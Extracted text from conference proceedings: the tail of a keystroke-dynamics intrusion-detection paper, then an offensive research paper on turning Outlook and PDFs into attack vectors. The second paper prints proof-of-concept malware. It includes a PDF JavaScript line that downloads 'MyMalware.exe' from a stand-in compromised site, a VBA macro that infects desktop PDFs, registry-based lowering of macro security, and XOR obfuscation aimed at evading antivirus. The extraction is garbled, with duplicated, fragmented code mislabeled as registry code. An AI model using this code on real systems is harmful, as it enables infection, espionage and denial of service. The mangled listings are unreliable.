how the log looks like. The computational weight of this module needs to be kept at a minimum level,
since “imprisoning” keystroke events for an exaggerated amount of time could lead to noticeable delays
on the system-wide responsiveness of the keystrokes. This “typing lag” would bother the user and affect
the desired transparency of the system. Therefore, the deep processing work is delegated to other
module when a full sample is logged.
Table 1: Log from typing the word “apples”
Down Up Time
A 0
A 6386
P 14824
P 11512
P 5752
L 6594
P 4921
L 9056
E 4943
E 5752
S 5761
S 7393
84

João Ferreira et al.
Establishing the size of a sample is an important decision. Longer samples imply an increased number of
n-graphs, thus improving sample accuracy since more shared n-graphs will be available for comparison
(Gunetti and Picardi, 2005). However, shorter samples ensure a faster periodicity of the proposed
solution’s process. We have opted for samples of 1500 events (around 750 characters), based on this
trade-off.
5.2 Sample processing
This module is responsible for converting the received raw sample log into a structured and normalized
sample. Table 2 illustrates how the logged samples (listed in the leftmost table) generate the subsamples
used by this solution, regarding different n-graphs.
Table 2: Subsamples generated from the raw sample log
Raw Sample Log Dwell Sample Flight Sample Digraph Sample
Down Up Time Graph Time Graph Time Graph Time
A 0 A 6386 A-P 14824 A+P 21210
A 6386 E 5752 E-S 5761 E+S 11513
P 14824 L 13977 L-E 4943 L+E 18920
P 11512 P 11512,11515 P-L - 4921 P+L 6594
P 5752 S 7393 P-P 5752 P+P 17264
L 6594
P 4921 Trigraph Sample Fourgraph Sample
L 9056 Graph Time Graph Time
E 4943 A+P+P 38474 A+P+P+L 45068
E 5752 L+E+S 30433 P+L+E+S 37027
S 5761 P+L+E 25514 P+P+L+E 42778
S 7393 P+P+L 23858
Note the presence of negative values on flight measurements. This is an example of overlapped typing
(result of pressing the succeeding key before releasing the previous one), very common on most users’
typing samples. Some users overlap a set of key combinations with extreme consistency, a differentiating
factor worth examining.
Once finished building the subsamples, execution proceeds by filtering outliers – typical of every
behavioral biometric traits, giving that human users as a source of data are naturally unpredictable.
Outlier times are filtered out, applying the widely used Interquartile Range (IQR) formula. However, on a
full sample, many graphs are typed just once. In these cases, we determine if their timing measure is in
fact an outlier regarding every other n-graph in its subsample – for example, if all trigraph times in a
user’s sample (there are around 500 trigraphs per sample) vary between 20000 and 40000, it is safe to
assume that a trigraph with a time of 80000 is not natural to that user.
Finally, this module calculates the mean and standard deviation for each graph, and outputs a fully
processed user sample (subsamples similar to the ones on Figure 2, now with fields for mean, standard
deviation and number of occurrences, instead of Time). If the user is new to the system (enrollment
phase), the sample goes straight to the user’s profile stored in database. In our proposed solution, a
single stored sample is enough for the system to finish the enrollment phase and proceed to the
validation phase. However, the decisions’ accuracy increases with more samples in storage, should the
user be willing to certify that he is the only one typing on the computer (a requisite during enrollment
phase) for a longer period of time. The number of stored samples needed to enter the validation phase is
customizable. If the user is already registered the system will be in validation phase – as a consequence,
the sample will be labeled as an authentication attempt, and sent to the Scores Calculation module.
5.3 Scores calculation
At this stage, we have a structured sample (the attempt) ready for evaluation. All samples from the user
profile in a centrally managed database are imported to the application in order to perform the necessary
comparisons. Sample length is a very important factor on the accuracy of a free text keystroke dynamics
algorithm (Gunetti and Picardi 2005; Hempstalk 2009), which is understandable, mainly because longer
profile samples will share more n-graphs with the attempts. On the other hand, long samples force longer
enrollment periods, make the system less responsive in passive mode (longer listening periods, and
consequently fewer validation stages), and provide a coarse update of the user’s typing evolution.
85

João Ferreira et al.
Therefore, published solutions end up compromising with setting an average sample length, never
benefiting from the advantages of both short and long samples.
Our proposed scoring module derives from the idea that it is possible to benefit from the user’s longest
possible sample for comparison, keeping the system iterating with reasonably short samples – like the
1500-event samples on which the proposed algorithm is based. During the calculation of scores, the
1500-event attempt sample will be compared against a unified user signature – a long sample with the
merged information of every 1500-event sample stored by that user. With this, the maximum amount of ngraphs
will be shared with the attempt, which consequently improves accuracy. Moreover, this merge is
done with a very low processing cost.
Each sample n-graph contains its average ( ), standard deviation ( ) and hit count (n). For a merged
sample with the combination (C) of two samples (sample 1 and 2), these values are obtained with the
formulas shown on Figure 2.
Figure 2: Obtaining average, standard deviation and hit count for a merged sample
With the merged sample and the attempt sample ready for comparison, the next step is to filter out all the
graphs that are not shared between them – these samples come from unrestrained text input, and
therefore are likely to not share every occurrence.
Our scoring algorithm is based on two measurements: absolute and relative comparisons. While absolute
comparisons rely solely on timing values for identity evaluation, relative comparisons refer to the order of
a user’s typing – the underlying rationale being the belief that if a legitimate user is known to type a
certain n-graph faster than another (e.g. if he types the trigraph “for” faster than “spa”), he will keep
consistently doing so, no matter the speed of his typing.
The global score of a sample is an average between the absolute and relative scores, as detailed below.
5.3.1 Absolute comparisons
For each shared graph, we compare the difference between the averages of the attempt and the sample.
If this difference falls below a certain threshold, the graph comparison is labeled as a success, being a
failure otherwise. Threshold setting is a key decision in this measurement.
The human user does not write every text segment with the same timing stability. On his typing
dynamics, he becomes so used to performing certain finger movements, that they become almost
automatic (hence the resort to fixed and frequently typed samples on most keystroke dynamics
solutions). This is a behavior that can be explored, by reducing the acceptance threshold value for graphs
the user is known to perform consistently (that is, with the lowest standard deviation values). While the
legitimate user will still easily qualify his graphs, an attacker will most likely fail due to the reduced
acceptance window. These graphs are called consistent graphs.
For each registered user, the database keeps and updates a record of their most consistent graphs (the
10% most consistent), on every subsample. This record is retrieved when the user profile is imported for
comparison. When comparing a shared graph, the threshold to apply will be determined by presence on
that record. By default, we use 1.25 as the regular threshold value, and 1.10 as the threshold for the
consistent graphs. These thresholds will then be adjusted depending on each user’s timing stability.
86

João Ferreira et al.
The absolute score of each subsample will be a success ratio of the comparisons carried out. Finally, the
final “absolute score” of a sample will be the weighted sum of each subsample score. The weight of each
subsample (currently equally weighted) will be determined by a later impact analysis.
This process is illustrated on Table 3.
Table 3: Illustration of absolute scores comparisons
Profile Sample Attempt
Sample
Time Graph Time Success Failure
38474 A+P+P 21402 38474/21402 = 1.798 X
30433 L+E+S 37022 37022/30433 = 1.217 X
25514 P+L+E* 29571 27571/25514 = 1.159 X
23858 P+P+L 33200 33200/23858 = 1.392 X
* - marked as a consistent graph
We can see an example of a comparison that successfully made the regular threshold (

5.5 Profile updating
João Ferreira et al.
This module is triggered in case an attempt is successfully validated. A valid 1500-event sample will be
stored in database alongside the rest of the user’s samples, to ensure that the user profile remains up-todate
with the user’s typing dynamics modifications along the time. The number of 1500-event samples
stored for each user is limited to 15 samples, taking into consideration the computational weight of the
scoring process. When the stored profile is already constituted by 15 samples, the oldest will be erased
to give way for the new one.
5.6 Prevention and reporting
The Prevention and Reporting module is triggered in case an attempt sample fails to validate, indicating
the probable presence of an intruder.
5.6.1 Reporting measures
Intrusions will be reported to a security log supervised by a security administrator. This solution uses the
attempt sample score’s distance to the threshold of user authentication as the indicator for the Alarm
Level of an intrusion detection – the rationale is that an intruder that scores far off the acceptance
threshold is much more probably an intruder, than someone who scored below the acceptance threshold
by a small margin. With intrusions being logged with three alarm degrees (Yellow, Orange, and Red, with
ascending severity), the security administrator will be able to prioritize his reaction to the intrusions
detected, and the problem of exaggerated False Alarms – an endemic problem of all IDSs (Axelsson,
1999) – can be alleviated through this mechanism.
5.6.2 Prevention measures
Current solutions, as well as this one, trigger an identity verification procedure each time a sample is
logged – what we call synchronous verifications. However, the larger number of n-graphs shared per
sample (resultant from this solution’s adoption of a merged imported user profile) allow for a trustable
identity verification even with shorter-sized samples, as long as a certain (to be determined through
experimentation) number of shared n-graphs is detected.
This creates an opportunity for prevention mechanisms, integrating with existing software applications in
order to trigger asynchronous verifications. For example, with a package like Microsoft Office, whenever
a user saves a document or sends an eMail, a verification process can be triggered to ensure this is an
action performed by the legitimate user. At that phase, the system is most certainly still in the process of
logging a 1500-event sample, but nevertheless it can be able to perform a valid decision. Insufficient
number of shared n-graphs detected during the asynchronous verification is an indicator (along with the
last sample’s timestamp) that the last synchronous decision may be recent enough for usage.
5.7 Security concerns
The fact that this biometric assessment encompasses a keystroke monitoring agent is per se a reason for
user apprehension (particularly since malicious keystroke loggers became ubiquitous). This solution
would pose a greater security risk than the original problem it tries to address, if the text typed by every
user could be reproducible. Therefore, making sure that none of the mentioned attacks are possible is
critical to the relevance of the method and to the acceptability of the solution.
Keystrokes are stored as a hash value (using SHA-256), and the original keystroke identifiers are
masked before hashing (otherwise known-plaintext attacks would be trivial). Samples are sent to the
server in large chunks of data, preventing typing sequence to be recovered. Since stored samples feature
the hit count of each graph, attacks based on frequency analysis are a possibility. However, these are
strongly based on language, and normally restricted to alphabetical keys and real text input – our
samples, being generated from unrestrained typing, do not set language restrictions, refer not only to real
text input but also to any other typing tasks (such as coding or gaming), and monitor non-alphabetical
(and even non-alphanumerical) keys. Therefore, the chance of text reproduction using this technique is
also significantly reduced. Without text reproduction, these samples are unusable, even if stolen. Still,
studies have demonstrated that even with full knowledge of a user typing habit, learning and reproducing
it is a very difficult task (Rundhaug, 2007).
88

João Ferreira et al.
Key masks and hash values are not reflected on the tables and figures of this article, in order to facilitate
their comprehension.
6. Experimental environment
For validation purposes, a prototype version of the proposed solution featuring just the Event Logging
and Sample Processing functionalities (aiming the capture of samples) was installed on several
computers, in a real organization. This application is automatically executed when the user logs in the
system and is completely transparent – runs in the background without ever giving signs of its presence.
The captured samples will serve as input to the Scores Calculation module (a centralized unit during this
experimental phase).
Samples are being captured during the users’ sessions with absolutely no restrictions on text input –
users are producing samples while writing eMails, posting in forums, coding, writing in Portuguese (native
language) or in English, etc. Each sample has a fixed length of 1500 events (around 750 characters).
Each user will log up to 15 samples. The program is currently installed on a user base of around 200
participants – resulting in 15 legitimate attempts and around 2985 (199 intruders, each registering 15
samples) intrusion attempts for each user.
A thorough analysis of the results from this experiment will be posted in a subsequent report. This will be
an important step to retrieve statistically relevant metrics in order to optimize the model design and the
algorithm’s performance. The most relevant, as with any IDS, will be the False Acceptance and False
Rejection Rates (FAR/FRR) – global and for each subsample.
7. Conclusion and future work
In this paper we have proposed a solution to perform anomaly-based intrusion detection through the use
of keystroke dynamics biometrics. Some approaches were introduced based on published literature. The
proposed solution includes several improvements, namely on the filtering of unrestrained text input,
sample organization, scores calculation, decision process and the ability of asynchronous profile
evaluation. The experimentation period will allow for refinements on which we believe is already an
interesting new step in the area. Studying the benefits of the addition of pointer dynamics measurements,
a popular complement to keystroke dynamics, is also an objective for the future.
In recent years, the way a human user interacts with computers is being progressively transferred to
touch interfaces. With current tendencies, we can no longer be sure of the presence of physical
keyboards in every computer on the next five or ten years. However, virtual keyboards also provide the
timing measures used to build the current keystroke dynamics solutions. Successfully porting this solution
to virtual interfaces is a challenging possibility worth exploring in future works.
References
Ahmed, A.A.E. and Traore, I. (2005) 'Anomaly Intrusion Detection Based on Biometrics', Proceedings from the Sixth
Annual IEEE SMC , West Point, 452-453. BIBLIOGRAPHY \l 2070
Axelsson, S. (1999) 'The base-rate fallacy and its implications for the difficulty of intrusion detection', Proceedings of
the 6th ACM conference on Computer and communications security, New York, 1-7.
Bergadano, F., Gunetti, D. and Picardi, C. (2002) 'User authentication through keystroke dynamics', ACM
Transactions on Information and System Security, vol. 5, no. 4, November, pp. 367 - 397.
Chinchani, R., Iyer, A., Ngo, H.Q. and Upadhyaya, S. (2005) 'Towards a Theory of Insider Threat Assessment', 2005
International Conference on Dependable Systems and Networks (DSN'05), 108-117.
Dowland, P.S. and Furnell, S.M. (2004) 'A Long-Term Trial of Keystroke Profiling Using Digraph, Trigraph and
Keyword Latencies', Security and Protection in Information Processing Systems, vol. 147, pp. 275-289.
Gunetti, D. and Picardi, C. (2005) 'Keystroke Analysis of Free Text', ACM Transactions on Information and System
Security, vol. 8, no. 3, August, pp. 312-347.
Hempstalk, K., 2009. Continuous Typist Verification using Machine Learning.
Iwasaki, K., Miyaki, T. and Rekimoto, J. (2009) 'Expressive typing: a new way to sense typing pressure and its
applications', Proceedings of the 27th international conference extended abstracts on Human factors in
computing systems , Boston, 4369-4374.
Jiang, C.-H., Shieh, S. and Liu, J.-C. (2007) 'Keystroke statistical learning model for web authentication', Proceedings
of the 2nd ACM symposium on Information, computer and communications security, New York, 359-361.
Liu, S. and Silverman, M. (2001) 'A Practical Guide to Biometric Security Technology', IT Professional, vol. 3, no. 1,
pp. 27-32.
Lopatka, M. and Peetz, M.-H. (2009) 'Vibration Sensitive Keystroke Analysis ', Proceedings of the 18th Annual
Belgian-Dutch Conference on Machine Learning, Tilburg, 75-80.
89

João Ferreira et al.
Lynch, D.M. (2006) 'Securing Against Insider Attacks', Information Security Journal: A Global Perspective, vol. 15,
no. 5, November, pp. 39-47.
Magalhães, P.S., 2005. Estudo dos Padrões de Digitação e Sua Aplicação na Autenticação Biométrica.
Marsters, J.-D., 2009. Keystroke Dynamics as a Biometric. Available at: http://eprints.soton.ac.uk/66795/.
Monrose, F. and Rubin, A.D. (2000) 'Keystroke dynamics as a biometric for authentication', Future Generation
Computer Systems - Special issue on security on the Web, vol. 16, no. 4, February, pp. 351-359.
Robinson, J.A., Liang, V.W., Chambers, J.A.M. and MacKenzie, C.L. (1998) 'Computer user verification using login
string keystroke dynamics ', IEEE Transactions on Systems, Man, and Cybernetics, Part A: Systems and
Humans, vol. 28, no. 2, March, pp. 236-241.
Rundhaug, F.E.N., 2007. Keystroke Dynamics - Can Attackers Learn Someone's Typing Characteristics.
Schneier, B. (2009) 'Thwarting an Internal Hacker', The Wall Street Journal, 16 February.
Schultz, E.E. (2002) 'A Framework for Understanding and Predicting Insider Attacks', Computers & Security, vol. 21,
no. 6, October, pp. 526-531.
90

Perverting eMails: A new Dimension in Internet (in) Security
Eric Filiol, Jonathan Dechaux and Jean-Paul Fizaine
ESIEA - Operational virology and cryptology laboratory, France
filiol@esiea.fr
https://sites.google.com/site/ericfiliol/
Abstract: Electronic mail (or email) has not just changed the way we communicate in our daily life; it has
transformed the way we do business today. Considered a convenient, powerful and a low cost tool, it is widely used
to convey all kind of information including -unfortunately - sensitive or confidential information such as passwords,
personal data, and private information. In recent times, two emerging technologies, referred to as the cloud
computing and browser-based email technologies, have gained popularity among users and, along the way, also
added a new significant layer of risk: It is common practice now from users to store their passwords into email folders
and even worse, most of those browsers store and remember your password to open your email account
automatically. Let’s imagine the consequences of an attack launched by cybercriminals designed to resend and
divert the original functionalities and features inherent to the browser for any malicious purpose, or worse - terrorist
attempts. Let’s take for example a US military officer operating in a country at war such as Afghanistan simply
sending emails to his family to keep in touch with them. Whenever he sends an email, thousands of emails
containing racial slurs against Muslim people are automatically sent to Afghan troops from his web account without
him knowing it. The consequences of such an action would be unquestionably devastating. This above example,
though fictitious, illustrates how efficient this kind of emails could be for both war propaganda and deception
operations against US troops. Now imagine a company ‘s decision maker who daily exchanges large amounts of
emails containing sensitive or confidential information within and outside his company ranging from trade secrets,
contracts details, customer lists, research reports, financial information to staff’s personal details. Modifying the
browser-based email technology could enable any ill-intended person to wiretap and to eavesdrop any email directly
at the browser’s level to record any sent data and to make them evade from the computer towards unscrupulous
people. The collection of the daily flow of emails, both internally and externally, definitely provides a snapshot of a
company's overall culture and is proving to be a powerful and efficient tool used for both industrial and economic
espionage. As a last example, these technologies once modified, could be used to set up thousand of zombies in
mail clients. For that purpose, a large number of email clients would simultaneously send thousands of mails to a
single target – e.g. an email server -- to deny mail service for a limited period of time. We can easily imagine that this
kind of attack launched on any stock exchange computer systems would entail damaging economic repercussions
for the affected country and would probably plunge it into chaos for some time. In this paper, we will explain and
show that email can be used as a ideal weapon for terrorism, cyber warfare, espionage, denial of service and can
cripple all sectors of economy and nation states. We will address these issues both at the technical and operational
level. In any case, we have considered systems with the most restricted user’s privileges, but making those attacks
really easy and powerful.
Keywords: eMail, terrorism, cyber-attack, espionage, email client, browsers, cyber warfare
1. Introduction
In recent years, companies, governments and institutions have been facing new threats especially due to
the ever-growing menace of cyber-terrorism which takes place on a new space. This ongoing threat has
plunged the world into a permanent cyber warfare state, with the power to keep the victims at war for the
indefinite future.
The most common and typical threats today are industrial, government or military espionage and the
disruption of institutions using denial of service attacks. However, other risks are emerging and the new
cyber-criminals’ playground is information manipulation ranging from propaganda war to disinformation or
surfeit of information. In this field, the targets are manifold and the cyber-criminals behind the operations
may belong to government institutions or small groups. Recent attacks on governmental communication
networks showed that one of the main entry points used is an office solution. Last attacks on German
chancellery or on the financial European system have been unfortunately successful. Surveys showed
that both attacks were based on diverting the macro documents away from their original use.
Other office applications can be used, such as email management software. Our focus here is to show
how outlook software which uses macros to operate turns out to be an excellent tool to launch a massive
attack mainly because it is one of the most commonly used products on the market. Our purpose is to
demonstrate through three proofs of concepts, how cyber-criminals can misuse email software to perform
malicious acts related to cyber terrorism or cyber warfare. These attacks only require the use of office
documents - in PDF format exclusively - as attack vectors. Other proofs of concepts based on PDF files
91

Eric Filiol et al.
exist as well and have been studied by (Blonce et al. 2008) and in (Stevens 2010). Other attacks based
on the use of malicious macros have also been introduced in (Dechaux et al. 2010a; 2010b).
As a first step, we will study the structure of a PDF file and then show how it can be misused to weaken
the victim. As a second step, we will review the main features of outlook, and then highlight the
configuration weaknesses enabling a macro to be transparently executed. Given the perennial nature of
the attack (the purpose here is not to exploit any software vulnerability), we will describe the infection
mechanism inherent to the PDF language. The infection is actually based on various strategies and our
goal is to demonstrate how the PDF language can be used in an attack situation. The next step is to
show that once the victim is weakened, the macro can be executed in a transparent way.
At last, we will consider how cyber-criminals can operate mail server attacks, perform espionage
activities, or launch propaganda wars though a misuse of email software though a misuse of email
software though a misuse of email software.
This paper is organized as follows. Section 2 presents the basics about office documents and a few
technical aspects around PDF format, JavaScript, Microsoft Office and OpenOffice macros and the
security of those macros. Section 3 exposes how our attack is prepared and which kind of infection vector
is used. We also present our attack strategy. Section 4 present three operational scenario of attacks:
email server DoS, email eavesdropping (espionage) and propaganda (information operations). Of course,
many more scenarios are possible.
Due to the lack of space, only the critical pieces of proof-of-concept codes are given in this paper. The
complete source code can be obtained by contacting the first author.
2. Fundamental and technical concepts
In order to present our attacks, the reader must learn about a few concepts related to office documents:
PDF documents, documents with macros (Microsoft Office or OpenOffice) and the way the related
security issues are organized both at the application and the operating system level.
2.1 PDF structure and JavaScript
Our attacks exploit the possibility for a PDF document (actually a script file written in PDF language) to
embed JavaScript primitives and code. In order to manage JavaScript primitives – adding, editing,
embedding -- at the code level in PDF code itself, it is necessary to use application like Acrobat Editor (or
equivalent applications like Scribus). Alternatively, it is also yet trickier, to work directly at the code level
with a simple text editor.
The full specifications of PDF format are available in the Adobe reference document (Adobe, 2007 &
2008). We shall recall in this section only the important elements of the PDF. A PDF file is organized in
four different parts.
The Header: The file begins with a magic number, which specifies that it is a PDF document while
indicating its version. Currently the PDF format is version 1.7. The next line consists of a single object
of type ``dictionary’’.
The Body: It is the content itself of a PDF file, represented by objects organized in lists or in trees. It
begins with an object named Document Catalog, whose presence is mandatory, and with the content
basis (a dictionary which references some of the content objects).
The Cross-reference table: this is the most critical part in any PDF files. This table contains all
references to the different objects composing a PDF file. It is in fact a simple table of pointers (in fact
offsets). Any access to objects can be direct and random in order to optimize performances with
respect to PDF file management and display. The table begins with the keyword xref.
The Traiter: it is made of a dictionary object whose elements are special objects and of a pointer to
the Cross-reference table.
Data displayed by PDF files are build from seven different kind of objects, which are themselves
organized in trees or/and in lists. To illustrate the structure of a simple PDF file containing a JavaScript
piece of code which is executed whenever the PDF file is opened.
92

Eric Filiol et al.
27 0 obj
>
stream
function hello()
{
var myData = "Hello World";
app.alert({ cMsg: myData, cTitle: "Acme Testing Service" });
}
endstream
endobj
28 0 obj
>
endobj
29 0 obj
>
endobj
7 0 obj
>
Endobj
To execute the JavaScript part, we need to insert an additional entry in the object catalog.
/OpenAction >
The keyword /OpenAction allows to specify that an action must be executed at the document opening.
The command takes either an array, or a dictionary as an argument. In the case of the JavaScript
execution, a ``dictionary’’ object is used and flags /S and /JS must be used. The first one declares the
presence of a script. Whenever followed by the sequence`` /JavaScript’’, it defines the nature of language
(here JavaScript). The next argument, \JS, defines the function to be executed.
More generally, a PDF is able to react to certain events (the PDF is hence event-oriented). It is then
possible to associate an action to an operation. All the possibilities are listed in the Adode reference
documents (Adobe, 2008).
2.2 Document macros and security configuration related to macros
Any Microsoft Office/OpenOffice document can contain macros whose purpose is to automatize a
number of actions or perform different kinds of internal/external actions. The main intent is to provide
ergonomics and easy-to-useness to users. Without loss of generality we will consider the case of
Microsoft Office only on Windows systems.
The macro security level is mostly defined and enforced at the operating system level (Dechaux et al.,
2010a & 2010b), in the Windows registry base (user-specific section “HKEY_CURRENT_USER”). We
find the level of security in the key “Security”, under the name “Level”.
For Outlook 2007, the path for the key “Security” is
HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Outlook
while for Outlook 2010, the path for the key “Security” is
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook
The security level is a “REG_DWORD” and it ranges from 1 to 4 corresponding to four possible security
levels in Outlook (and for any other application Word, Excel, Powerpoint…). Contrary to Microsoft Word
or Excel, the values in the registry are the same as the corresponding level of security
Level 4: no warnings and disable all macros (registry value 0x00000004).
Level 3: warnings for signed macros only. All unsigned macros are disabled (registry value
0x00000003).
93

Eric Filiol et al.
Level 2: warnings for all macros (registry value 0x00000002).
Level 1: no security check for macros (not recommended) (registry value 0x00000001).
To achieve our attacks, it will be necessary to change the value of this “REG_DWORD” to the lowest
possible value, i.e. the “Level 1: 0x00000001” (of course without triggering any alert/warning [Dechaux et
al., 2010a & 2010b] neither form the operating system nor any antivirus software in place).
2.3 Outlook macros
Let us now explain where Outlook macros are stored. The latter are located in a special file, whose
extension is ``OTM”. This OTM file OTM is user-specific, as registry variable are. This file is named
``VbaProject.OTM” and it path is given by:
C:\Users\\AppData\Roaming\Microsoft\Outlook
It is not possible to edit this file directly and access to the information in it. Indeed it is compiled by the
Microsoft Office suite whenever it is opened. However, since it is a user-specific file, we can replace it by
a malicious version of it (e.g. containing our malicious macros).
All Outlook macros are written in Visual Basic. Any macro can call external functions from the Windows
API. Regarding the execution of macros in Outlook, we are going to use three different macro execution
modes, whenever Outlook is opened or an email is sent or received.
Private Sub Application_ItemSend(ByVal Item As Object, Cancel As Boolean)
End Sub
Private Sub Application_NewMail( )
End Sub
Private Sub Application_Startup( )
End Sub
According to the type of attack whom we are going to perform, we will use one to three modes. For some
reason (mainly to bypass antiviral detection mechanisms), we have to use delay in attacks. For that
purpose, it is also necessary to define a sleep function, which is not a Visual Basic primitive but a
Windows API function.
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
3. PDF files as infection vectors
Contrary to (malicious) Word or Excel documents, there are no Outlook documents. So we must imagine
a different kind of infection vector to install malicious macros. We are going to use PDF files.
3.1 Attack strategy
Microsoft macros are not executed by default. We know that the configuration of Outlook allows or not
the execution of the macro and this configuration is stored in the registry. It is then necessary to change
this setting in a way or another: either through a user’s direct action or through an innocent-looking
external program. But any suspicious user is not likely to execute executables. But any user generally
accepts to open PDF files. Consequently we are going to use this powerful infection vector.
Our attack is based on k-ary malware (Filiol, 2007). The general principle consists in using k different,
innocent looking files, whose actions are combined to perform a viral attack. The malware code is split
into k different parts which can be independent one from the other, or not. Each part is responsible for a
specific action which has been assigned to it.
For our attack we used k = 3 as follows:
The first part (the infectious agent) is devoted to the initial infection (primo infection or infection
setup).
The second part (which is installed by the first one) modifies the target system to lower it security: the
macro security level is set to level 1, the malicious macro is installed.
94

Eric Filiol et al.
The third part (contained in the malicious macro) is dedicated to the payload (the offensive action)
which is triggered whenever an email is sent by the user.
Our infection strategy (see Figure 1) is based on malicious PDF file.
Figure 1: PDF file-based infection strategy.
3.2 Introduction of the infectious agent
We chose a very simple yet powerful technique. The agent is downloaded from the PDF file which has
been sent to the user. However it will not download the executable directly but, instead it contains a
JavaScript which calls the default browser. The latter itself performs the download.
this.lauchURL("http://www.compromisedSite/MyMalware.exe"):
The implementation consists in a simple line of code. It calls the document through the object ``this’’ and
then calls the launchURL method with the address from which the download shall be performed, as an
argument. Upon execution this simple line of code downloads the file ``MyMalware.exe’’ immediately.
The weakness - on which our attack relies - lies in the browsers’ inability to manage the security
efficiently. In order to have a universal and portable infection step, we can alternatively embark the
executable in the PDF file which then has to extract it.
Among many methods to perform this, we used the “ExportDataObject” and “saveAs” methods. The most
interesting approach is the use first one because it allows the execution of the executable, contrary to the
95

Eric Filiol et al.
method “saveAs” which does not allow it. It is necessary to use the possibilities of the PDF format by
using launch primitives (Filiol 2008). However we have to synchronize the download and execution
actions to make sure that the infectious agent itself is executed safely (without triggering antivirus alert).
3.3 PDF Infection mechanism
Figure 2: Infection mechanism
To go on with the infection and operate on a larger scale, we chose to infect all PDF on the desktop of
the victim. We are going to list all the documents which have a PDF extension and infect them. To do
this, we wrote a macro that will be executed whenever Outlook is opened, by using the
“Application_StartUp( )” mode. Hence we modify the PDF code by inserting
our malicious executable
(ME) in the PDF file and adding the JavaScript primitive to execute ME.
Here follows the code that performs this infection. It is divided into two parts (see Figure 2):
The definition of variables and objects required along with the recovery of the user’s name.
The infection of PDF files which are on the desktop.
The macro has to insert the JavaScript code, /JS, in the Catalog object of the document so that the
JavaScript is executed. If the document is present then it is enough
to add an additional entry. In the case
of
the object does not exist, it will be necessary to create it.
Private Sub Application_Startup()
' Error management
On Error Resume Next
' Variable definition
Dim objFSO, objDossier, objFichier
Dim Repertoire, UserName
' Get the session username
96

Eric Filiol et al.
UserName = Environ("username")
Repertoire = "C:\Users\" & UserName & "\Desktop"
' Object definition
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objDossier = objFSO.GetFolder(Repertoire)
' For each pdf file on the desktop
If (objDossier.Files.Count > 0) Then
For Each
objFichier In objDossier.Files
If (InStr(1, objFichier.Name,
".pdf", 1) > 0) Then
' Pdf path creation
path = Repertoire & "\" & objFichier.Name
' Open the file in reading
Open p ath For Input As #1
While Not
Eof(1)
Line input #1, buff
table = table + buff + Chr(13)
Wend
Close #1
' Research
' Modification
' Open the file in writing
Open path For Output As
#1
Print
#1, table
Close #1
End If
Next
End If
' Variable release
objResultat.Close
Set objDossier = Nothing
Set
objFSO = Nothing
End
Sub
3.4 Modification of the macro security setting
' Read the data
To conduct our attacks, it is necessary to modify the relevant registry keys and to set the value “Level” to
1.
For that purpose, we use three functions RegCreateKeyEx( ), RegSetValueEx( ) and RegCloseKey( ).
The function RegCreateKeyEx( ) creates the key “Security” if it does not exist in the registry, otherwise it
will open it. The function RegSetValueEx( ) modifies the value of the variable “Level” to set it to 1. The
function RegCloseKey( ) closes the key “Security”. The corresponding code to modify the Outlook macro
security level is given hereafter. It is worth mentioning that this piece of code does not trigger any antiviral
software
alert.
int
{
main(int ac, char **av)
int fd, rt, size;
char *stringToDecipher = "Hello world,
we had a lovely sunny day";
char
*file;
unsigned char *pkey;
/* Generating the environmental key */
pkey = envGenKey("/Applications",
pkey);
if (pkey == NULL)
return -1;
97

puts("Key Generated");
Eric Filiol et al.
/* choosing the mode, cipher or decipher */
if (strncmp(av[1],
"-e", 2) == 0)
{
puts("CIPHER MODE");
/* the cipher
mode */
if (ac != 3)
{
puts("USAGE: ECIW
-e stringToCipher");
return
-1;
}
/* we give the string to cipher
on the command line */
file = cypher(av[2],
pkey);
if (file == NULL)
{
puts("ERROR ciphering
process");
return
-1;
}
printf("The
encrypted data is ==> %s\n", file);
}
/* Decipher the string */
else
if(strncmp(av[1], "-d", 2) == 0)
{
puts("DECIPHER
MODE");
if (ac != 4)
{
puts("USAGE: ECIW
-d stringToDecipher outputFile");
return
-1;
}
if (ac == 3)
file = cypher(stringToDecipher, pkey);
else
file = cypher(av[2], pkey);
fd = open(av[3],
O_WRONLY);
if (fd == -1)
return -1;
size = strlen(file);
rt = write(fd, file, size);
close(fd);
if (rt == -1)
return -1;
}
return
0;
}
3.5 Anti-antiviral mechanisms
For a better protection against antivirus detection, we have used a number of obfuscation techniques.
The strategy, we have chosen is to operate at the binary level. The macro is embedded in the binary file
under an encrypted form to avoid being detected by anti-virus. The infection process has then first
to
decipher
the macro in memory and to overwrite Outlook’s original macro with the malicious macro.
98

Eric Filiol et al.
The macro is enciphered using one of the simplest methods: the constant XOR function. In Dechaux et
al. (2010a) it has been exposed how this lame method was still successful at defeating all antivirus
software. The encryption key is not stored inside the binary file to prevent static analysis. Instead we use
an environmental key as suggested in (Filiol 2007). It is generated only whenever needed. From the
perspective of malware analyst, the only way to recover the key is either to use Brute Force or by
conducting a dynamic analysis, following the execution step by step.
Here it is the main function for the extraction of the macro file:
int main(int ac, char **av)
{
int fd, rt, size;
char *stringToDecipher = "Hello world, we had a lovely sunny day";
char *file;
unsigned char *pkey;
/* Generating the environmental key */
pkey = envGenKey("/Applications", pkey);
if (pkey == NULL)
return -1;
puts("Key Generated");
/* choosing the mode, cipher or decipher */
if (strncmp(av[1], "-e", 2) == 0)
{
puts("CIPHER MODE");
/* the cipher mode */
if (ac != 3)
{
puts("USAGE: ECIW -e stringToCipher");
return -1;
}
/* we give the string to cipher on the command line */
file = cypher(av[2], pkey);
if (file == NULL)
{
puts("ERROR ciphering process");
return -1;
}
printf("The encrypted data is ==> %s\n", file);
}
/* Decipher the string */
else if(strncmp(av[1], "-d", 2) == 0)
{
puts("DECIPHER MODE");
if (ac != 4)
{
puts("USAGE: ECIW -d stringToDecipher outputFile");
return -1;
}
if (ac == 3)
file = cypher(stringToDecipher, pkey);
else
file = cypher(av[2], pkey);
fd = open(av[3], O_WRONLY);
if (fd == -1)
99

eturn -1;
size = strlen(file);
rt = write(fd, file, size);
close(fd);
if (rt == -1)
return -1;
}
return 0;
}
4. Three operational scenario of attacks
Eric Filiol et al.
Let us now present how to use the previous attack techniques in real cases.
4.1 Email server DoS
This attack is very simple; we are going to send infinity of emails from a target user’s client at a specific
date. We chose for this example, September 11 th , 2011, ten years after the Twin Towers bombing. The
Denial of Service (DoS) will strike either a governmental state email server or a stock exchange email
server in order to block the economy.
We get the current date of the system and compare it with September 11 th . If it matches or exceeds the
